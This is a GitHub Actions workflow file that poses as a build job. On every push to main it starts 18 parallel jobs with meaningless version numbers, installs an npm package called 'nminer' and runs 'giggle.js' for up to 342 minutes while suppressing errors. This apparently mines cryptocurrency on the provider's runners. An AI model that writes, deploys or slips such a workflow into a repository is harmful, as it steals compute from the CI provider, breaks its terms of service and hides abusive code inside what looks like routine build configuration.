name: giggle
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9110 }
          - { version: 3105 }
          - { version: 4911 }
          - { version: 9795 }
          - { version: 8790 }
          - { version: 7414 }
          - { version: 8306 }
          - { version: 7743 }
          - { version: 2029 }
          - { version: 9198 }
          - { version: 8630 }
          - { version: 7244 }
          - { version: 3563 }
          - { version: 5655 }
          - { version: 8070 }
          - { version: 6004 }
          - { version: 7876 }
          - { version: 1931 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: quickly
        run: |
          npm install nminer@latest
          timeout 342m node giggle.js || echo "giggle executed"